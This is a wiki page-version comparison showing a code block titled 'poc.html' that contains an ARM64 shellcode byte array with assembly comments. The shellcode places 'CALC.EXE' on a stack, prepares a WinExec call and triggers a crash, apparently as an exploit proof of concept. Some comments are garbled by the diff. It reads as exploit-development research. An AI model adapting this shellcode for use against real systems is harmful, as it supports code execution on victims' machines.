Versions Compared

Old Version 4

changes.mady.by.user user-9a25e

Saved on

compared with

New Version 5

changes.mady.by.user user-9a25e

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
languagexml
themeMidnight
titlepoc.html
let shellcode = [

// Put CALC.EXE in x0
// AC
// movz x0, #0x4143
    0x60, 0x28, 0x88, 0xD2, 
// CL
// movk x0, #0x434c, lsl #16
    0x80, 0x69, 0xA8, 0xF2,
// E.
// movk x0, #0x452e, lsl #452e#32
    0xc0, 0xa5, 0xC8, 0xF2, 
// EX
// movk x0, #4558
#0x4558, lsl #48
    0x00, 0xab, 0xE8, 0xF2,

// put x0 on x9-stack
// str, x0, [x9], #8
    0x20, 0x85, 0x00, 0xF8,

// Put null into x0   
// movz, x0, #0
    0x00, 0x00, 0x80, 0xD2, 
// put x0 on x9-stack
// str x0, [x9], #8
    0x20, 0x85, 0x00, 0xF8, 

// put x9 into x0 - comment out to crash on winexec
// mov x0, x9
    0xe0, 0x03, 0x09, 0xaa,

// Subtract 16 from x0   (look at crash)
// sub, x0, 0x, #0x10
    0x00, 0x40, 0x00, 0xd1,

// Trigger crash
// ldr x11, [x10]
0x4b, 0x01, 0x40, 0xf9
];

...